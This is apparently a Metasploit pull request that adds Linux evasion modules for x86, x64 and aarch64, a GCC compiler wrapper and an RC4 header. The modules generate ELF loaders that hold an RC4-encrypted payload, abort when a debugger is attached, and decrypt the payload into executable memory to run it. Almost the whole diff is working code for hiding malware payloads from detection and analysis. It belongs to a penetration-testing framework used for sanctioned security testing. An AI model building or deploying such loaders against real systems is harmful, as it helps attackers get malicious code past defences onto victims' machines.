### PR TITLE
Add Linux ELF C encrypted payload evasion modules

### DIFF
--- a/data/headers/linux/rc4.h
+++ b/data/headers/linux/rc4.h
@@ -1,0 +1,51 @@
+//
+// License:
+// https://github.com/rapid7/metasploit-framework/blob/master/LICENSE
+//
+// This code was originally obtained and modified from the following source
+// by Bobin Verton:
+// https://gist.github.com/rverton/a44fc8ca67ab9ec32089
+
+#ifndef MSF_RC4_H
+#define MSF_RC4_H
+
+#include <string.h>
+
+#define RC4_N 256
+
+static void rc4_swap(unsigned char *a, unsigned char *b) {
+  unsigned char tmp = *a;
+  *a = *b;
+  *b = tmp;
+}
+
+static void rc4_ksa(const char *key, unsigned char *S) {
+  int len = (int)strlen(key);
+  int j = 0;
+  int i;
+  for (i = 0; i < RC4_N; i++) S[i] = (unsigned char)i;
+  for (i = 0; i < RC4_N; i++) {
+    j = (j + S[i] + key[i % len]) % RC4_N;
+    rc4_swap(&S[i], &S[j]);
+  }
+}
+
+static void rc4_prga(unsigned char *S, const unsigned char *plaintext,
+                     unsigned char *ciphertext, int len) {
+  int i = 0, j = 0, n;
+  for (n = 0; n < len; n++) {
+    i = (i + 1) % RC4_N;
+    j = (j + S[i]) % RC4_N;
+    rc4_swap(&S[i], &S[j]);
+    ciphertext[n] = S[(S[i] + S[j]) % RC4_N] ^ plaintext[n];
+  }
+}
+
+static void RC4(const char *key, const unsigned char *plaintext,
+                unsigned char *ciphertext, int len) {
+  unsigned char S[RC4_N];
+  rc4_ksa(key, S);
+  rc4_prga(S, plaintext, ciphertext, len);
+}
+
+#endif /* MSF_RC4_H */

--- a/lib/metasploit/framework/compiler/linux.rb
+++ b/lib/metasploit/framework/compiler/linux.rb
@@ -1,0 +1,105 @@
+require 'open3'
+require 'tmpdir'
+
+module Metasploit
+  module Framework
+    module Compiler
+
+      # Compiles C source code into native Linux ELF binaries using GCC.
+      # Mirrors the interface of Metasploit::Framework::Compiler::Windows.
+      class Linux
+
+        GCC_X64     = 'gcc'
+        GCC_X86     = 'gcc'
+        GCC_AARCH64 = 'aarch64-linux-gnu-gcc'
+
+        # Path to Linux-specific bundled headers (e.g. rc4.h).
+        HEADERS_DIR = File.join(Msf::Config.data_directory, 'headers', 'linux')
+
+        # Compiles a C source string into a Linux ELF binary.
+        #
+        # @param c_template [String] C source code to compile.
+        # @param arch [Symbol]  Target architecture: :x64, :x86, or :aarch64.
+        # @param opts [Hash]
+        # @option opts [Boolean] :strip    Strip debug symbols (default: true).
+        # @option opts [String]  :extra_flags  Additional flags passed to GCC.
+        # @raise [CompilationError] if the required GCC toolchain is missing or
+        #   compilation fails.
+        # @return [String] Raw bytes of the compiled ELF binary.
+        def self.compile_c(c_template, arch = :x64, opts = {})
+          gcc = gcc_binary(arch)
+
+          unless available?(arch)
+            raise CompilationError,
+                  "GCC for #{arch} not found ('#{gcc}'). " \
+                  'Install the required toolchain with your package manager.'
+          end
+
+          Dir.mktmpdir('msf_linux_compiler') do |tmpdir|
+            src_file = File.join(tmpdir, 'payload.c')
+            out_file = File.join(tmpdir, 'payload')
+
+            File.write(src_file, c_template)
+
+            cmd = build_cmd(gcc, arch_flag(arch), src_file, out_file, opts)
+            output, status = Open3.capture2e(cmd)
+
+            unless status.success?
+              raise CompilationError, "GCC compilation failed:\n#{output}"
+            end
+
+            unless File.exist?(out_file)
+              raise CompilationError, 'Compiled binary not found after GCC run'
+            end
+
+            File.binread(out_file)
+          end
+        end
+
+        # Returns whether the required GCC toolchain for the given arch is on PATH.
+        #
+        # @param arch [Symbol] :x64, :x86, or :aarch64.
+        # @return [Boolean]
+        def self.available?(arch = :x64)
+          !Msf::Util::Helper.which(gcc_binary(arch)).nil?
+        end
+
+        class CompilationError < StandardError; end
+
+        private_class_method def self.gcc_binary(arch)
+          case arch
+          when :x64     then GCC_X64
+          when :x86     then GCC_X86
+          when :aarch64 then GCC_AARCH64
+          else raise ArgumentError, "Unsupported arch: #{arch}"
+          end
+        end
+
+        private_class_method def self.arch_flag(arch)
+          case arch
+          when :x64     then '-m64'
+          when :x86     then '-m32'
+          when :aarch64 then ''
+          else ''
+          end
+        end
+
+        private_class_method def self.build_cmd(gcc, arch_flag, src_file, out_file, opts = {})
+          strip       = opts.fetch(:strip, true)
+          extra_flags = opts[:extra_flags].to_s
+
+          cmd  = "#{gcc} #{arch_flag} #{src_file}"
+          cmd << " -I #{HEADERS_DIR}"
+          cmd << " -o #{out_file}"
+          cmd << ' -z execstack'
+          cmd << ' -fno-stack-protector'
+          cmd << ' -no-pie'
+          cmd << ' -s' if strip
+          cmd << " #{extra_flags}" unless extra_flags.empty?
+          cmd
+        end
+      end
+
+    end
+  end
+end

--- a/modules/evasion/linux/aarch64/c_encrypted_payload.rb
+++ b/modules/evasion/linux/aarch64/c_encrypted_payload.rb
@@ -1,0 +1,129 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/compiler/linux'
+
+class MetasploitModule < Msf::Evasion
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Linux AArch64 C Encrypted Payload Generator',
+        'Description' => %q{
+          Generates a native Linux AArch64 (ARM64) ELF binary that embeds an RC4-encrypted
+          payload compiled from C source using GCC.
+
+          The binary allocates executable memory with mmap, decrypts the payload
+          at runtime and executes it directly in memory. An anti-tracing check
+          inspects /proc/self/status to detect ptrace attachment before execution.
+
+          Requires an AArch64 cross-compiler on the system running Metasploit
+          (e.g. apt install gcc-aarch64-linux-gnu).
+        },
+        'Author'      => ['Nipun Weerasinghe'],
+        'License'     => MSF_LICENSE,
+        'Platform'    => 'linux',
+        'Arch'        => [ARCH_AARCH64],
+        'Targets'     => [['Linux ARM64/AArch64', {}]],
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options([
+      OptString.new('FILENAME', [true, 'Output filename', 'payload.elf'])
+    ])
+  end
+
+  def rc4_key
+    @rc4_key ||= Rex::Text.rand_text_alpha(32..64)
+  end
+
+  def get_payload
+    @get_payload ||= begin
+      junk = Rex::Text.rand_text(10..1024)
+      buf  = payload.encoded + junk
+      {
+        size:     buf.length,
+        c_format: Msf::Simple::Buffer.transform(buf, 'c', 'buf', { format: 'rc4', key: rc4_key })
+      }
+    end
+  end
+
+  def c_template
+    @c_template ||= <<~CTEMPLATE
+      #include <sys/mman.h>
+      #include <string.h>
+      #include <stdlib.h>
+      #include <unistd.h>
+      #include <fcntl.h>
+      #include "rc4.h"
+
+      // RC4-encrypted payload
+      #{get_payload[:c_format]}
+
+      static const char rc4_key[] = "#{rc4_key}";
+      static const int  payload_len = #{get_payload[:size]};
+
+      static int is_traced(void) {
+        char buf2[512];
+        int fd = open("/proc/self/status", O_RDONLY);
+        if (fd < 0) return 0;
+        ssize_t n = read(fd, buf2, sizeof(buf2) - 1);
+        close(fd);
+        if (n <= 0) return 0;
+        buf2[n] = '\\0';
+        char *ptr = strstr(buf2, "TracerPid:");
+        if (!ptr) return 0;
+        ptr += 10;
+        while (*ptr == ' ' || *ptr == '\\t') ptr++;
+        return (*ptr != '0');
+      }
+
+      int main(void) {
+        if (is_traced()) return 0;
+
+        void *exec_mem = mmap(NULL, (size_t)payload_len,
+                              PROT_READ | PROT_WRITE | PROT_EXEC,
+                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+        if (exec_mem == MAP_FAILED) return 1;
+
+        unsigned char *dec = (unsigned char *)malloc((size_t)payload_len);
+        if (!dec) return 1;
+
+        RC4(rc4_key, (const unsigned char *)buf, dec, payload_len);
+        memcpy(exec_mem, dec, (size_t)payload_len);
+        free(dec);
+
+        ((void (*)(void))exec_mem)();
+        return 0;
+      }
+    CTEMPLATE
+  end
+
+  def run
+    raw_payload = payload.encoded
+    if raw_payload.blank?
+      fail_with(Failure::BadConfig, 'Failed to generate payload')
+    end
+
+    unless Metasploit::Framework::Compiler::Linux.available?(:aarch64)
+      fail_with(
+        Failure::BadConfig,
+        'AArch64 cross-compiler not found. ' \
+        'Install gcc-aarch64-linux-gnu (e.g. apt install gcc-aarch64-linux-gnu).'
+      )
+    end
+
+    vprint_line c_template
+
+    elf = Metasploit::Framework::Compiler::Linux.compile_c(c_template, :aarch64)
+    print_status("Compiled ELF size: #{elf.length} bytes")
+
+    File.binwrite(datastore['FILENAME'], elf)
+    File.chmod(0o755, datastore['FILENAME'])
+    print_good("Saved to: #{datastore['FILENAME']}")
+  end
+end

--- a/modules/evasion/linux/x64/c_encrypted_payload.rb
+++ b/modules/evasion/linux/x64/c_encrypted_payload.rb
@@ -1,0 +1,127 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/compiler/linux'
+
+class MetasploitModule < Msf::Evasion
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Linux x64 C Encrypted Payload Generator',
+        'Description' => %q{
+          Generates a native Linux x86_64 ELF binary that embeds an RC4-encrypted
+          payload compiled from C source using GCC.
+
+          The binary allocates executable memory with mmap, decrypts the payload
+          at runtime and executes it directly in memory. An anti-tracing check
+          inspects /proc/self/status to detect ptrace attachment before execution.
+
+          Requires GCC (x86_64) on the system running Metasploit.
+        },
+        'Author'      => ['Nipun Weerasinghe'],
+        'License'     => MSF_LICENSE,
+        'Platform'    => 'linux',
+        'Arch'        => [ARCH_X64],
+        'Targets'     => [['Linux x86_64', {}]],
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options([
+      OptString.new('FILENAME', [true, 'Output filename', 'payload.elf'])
+    ])
+  end
+
+  def rc4_key
+    @rc4_key ||= Rex::Text.rand_text_alpha(32..64)
+  end
+
+  def get_payload
+    @get_payload ||= begin
+      junk = Rex::Text.rand_text(10..1024)
+      buf  = payload.encoded + junk
+      {
+        size:     buf.length,
+        c_format: Msf::Simple::Buffer.transform(buf, 'c', 'buf', { format: 'rc4', key: rc4_key })
+      }
+    end
+  end
+
+  def c_template
+    @c_template ||= <<~CTEMPLATE
+      #include <sys/mman.h>
+      #include <string.h>
+      #include <stdlib.h>
+      #include <unistd.h>
+      #include <fcntl.h>
+      #include "rc4.h"
+
+      // RC4-encrypted payload
+      #{get_payload[:c_format]}
+
+      static const char rc4_key[] = "#{rc4_key}";
+      static const int  payload_len = #{get_payload[:size]};
+
+      static int is_traced(void) {
+        char buf2[512];
+        int fd = open("/proc/self/status", O_RDONLY);
+        if (fd < 0) return 0;
+        ssize_t n = read(fd, buf2, sizeof(buf2) - 1);
+        close(fd);
+        if (n <= 0) return 0;
+        buf2[n] = '\\0';
+        char *ptr = strstr(buf2, "TracerPid:");
+        if (!ptr) return 0;
+        ptr += 10;
+        while (*ptr == ' ' || *ptr == '\\t') ptr++;
+        return (*ptr != '0');
+      }
+
+      int main(void) {
+        if (is_traced()) return 0;
+
+        void *exec_mem = mmap(NULL, (size_t)payload_len,
+                              PROT_READ | PROT_WRITE | PROT_EXEC,
+                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+        if (exec_mem == MAP_FAILED) return 1;
+
+        unsigned char *dec = (unsigned char *)malloc((size_t)payload_len);
+        if (!dec) return 1;
+
+        RC4(rc4_key, (const unsigned char *)buf, dec, payload_len);
+        memcpy(exec_mem, dec, (size_t)payload_len);
+        free(dec);
+
+        ((void (*)(void))exec_mem)();
+        return 0;
+      }
+    CTEMPLATE
+  end
+
+  def run
+    raw_payload = payload.encoded
+    if raw_payload.blank?
+      fail_with(Failure::BadConfig, 'Failed to generate payload')
+    end
+
+    unless Metasploit::Framework::Compiler::Linux.available?(:x64)
+      fail_with(
+        Failure::BadConfig,
+        'GCC (x86_64) not found. Install gcc (e.g. apt install gcc).'
+      )
+    end
+
+    vprint_line c_template
+
+    elf = Metasploit::Framework::Compiler::Linux.compile_c(c_template, :x64)
+    print_status("Compiled ELF size: #{elf.length} bytes")
+
+    File.binwrite(datastore['FILENAME'], elf)
+    File.chmod(0o755, datastore['FILENAME'])
+    print_good("Saved to: #{datastore['FILENAME']}")
+  end
+end

--- a/modules/evasion/linux/x86/c_encrypted_payload.rb
+++ b/modules/evasion/linux/x86/c_encrypted_payload.rb
@@ -1,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/compiler/linux'
+
+class MetasploitModule < Msf::Evasion
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Linux x86 C Encrypted Payload Generator',
+        'Description' => %q{
+          Generates a native Linux x86 (32-bit) ELF binary that embeds an RC4-encrypted
+          payload compiled from C source using GCC.
+
+          The binary allocates executable memory with mmap, decrypts the payload
+          at runtime and executes it directly in memory. An anti-tracing check
+          inspects /proc/self/status to detect ptrace attachment before execution.
+
+          Requires GCC with multilib support on the system running Metasploit
+          (e.g. apt install gcc-multilib).
+        },
+        'Author'      => ['Nipun Weerasinghe'],
+        'License'     => MSF_LICENSE,
+        'Platform'    => 'linux',
+        'Arch'        => [ARCH_X86],
+        'Targets'     => [['Linux x86', {}]],
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options([
+      OptString.new('FILENAME', [true, 'Output filename', 'payload.elf'])
+    ])
+  end
+
+  def rc4_key
+    @rc4_key ||= Rex::Text.rand_text_alpha(32..64)
+  end
+
+  def get_payload
+    @get_payload ||= begin
+      junk = Rex::Text.rand_text(10..1024)
+      buf  = payload.encoded + junk
+      {
+        size:     buf.length,
+        c_format: Msf::Simple::Buffer.transform(buf, 'c', 'buf', { format: 'rc4', key: rc4_key })
+      }
+    end
+  end
+
+  def c_template
+    @c_template ||= <<~CTEMPLATE
+      #include <sys/mman.h>
+      #include <string.h>
+      #include <stdlib.h>
+      #include <unistd.h>
+      #include <fcntl.h>
+      #include "rc4.h"
+
+      // RC4-encrypted payload
+      #{get_payload[:c_format]}
+
+      static const char rc4_key[] = "#{rc4_key}";
+      static const int  payload_len = #{get_payload[:size]};
+
+      static int is_traced(void) {
+        char buf2[512];
+        int fd = open("/proc/self/status", O_RDONLY);
+        if (fd < 0) return 0;
+        ssize_t n = read(fd, buf2, sizeof(buf2) - 1);
+        close(fd);
+        if (n <= 0) return 0;
+        buf2[n] = '\\0';
+        char *ptr = strstr(buf2, "TracerPid:");
+        if (!ptr) return 0;
+        ptr += 10;
+        while (*ptr == ' ' || *ptr == '\\t') ptr++;
+        return (*ptr != '0');
+      }
+
+      int main(void) {
+        if (is_traced()) return 0;
+
+        void *exec_mem = mmap(NULL, (size_t)payload_len,
+                              PROT_READ | PROT_WRITE | PROT_EXEC,
+                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+        if (exec_mem == MAP_FAILED) return 1;
+
+        unsigned char *dec = (unsigned char *)malloc((size_t)payload_len);
+        if (!dec) return 1;
+
+        RC4(rc4_key, (const unsigned char *)buf, dec, payload_len);
+        memcpy(exec_mem, dec, (size_t)payload_len);
+        free(dec);
+
+        ((void (*)(void))exec_mem)();
+        return 0;
+      }
+    CTEMPLATE
+  end
+
+  def run
+    raw_payload = payload.encoded
+    if raw_payload.blank?
+      fail_with(Failure::BadConfig, 'Failed to generate payload')
+    end
+
+    unless Metasploit::Framework::Compiler::Linux.available?(:x86)
+      fail_with(
+        Failure::BadConfig,
+        'GCC (x86 / -m32) not found. Install gcc-multilib (e.g. apt install gcc-multilib).'
+      )
+    end
+
+    vprint_line c_template
+
+    elf = Metasploit::Framework::Compiler::Linux.compile_c(c_template, :x86)
+    print_status("Compiled ELF size: #{elf.length} bytes")
+
+    File.binwrite(datastore['FILENAME'], elf)
+    File.chmod(0o755, datastore['FILENAME'])
+    print_good("Saved to: #{datastore['FILENAME']}")
+  end
+end


### PR DESCRIPTION
  Introduce Metasploit::Framework::Compiler::Linux, a GCC-based compiler
  class mirroring the Windows compiler interface, enabling C source to be
  compiled into native ELF binaries from within Metasploit.

  Add evasion modules for x86, x64, and aarch64 that embed an RC4-encrypted
  payload in a generated C template, compile it to a native ELF via GCC,
  and execute the decrypted payload in mmap'd RWX memory at runtime.
  Includes an anti-ptrace check via /proc/self/status before execution.

  Also adds data/headers/linux/rc4.h as a bundled RC4 header for use
  in Linux C templates.

  Closes #21164

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!

Specific Hardware Examples:
* Switches
* Routers
* IP Cameras
* IoT devices

Complex Software Examples:
* Expensive proprietary software
* Software with an extensive installation process
* Software that requires exploit testing across multiple significantly different versions
* Software without an English language UI

We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
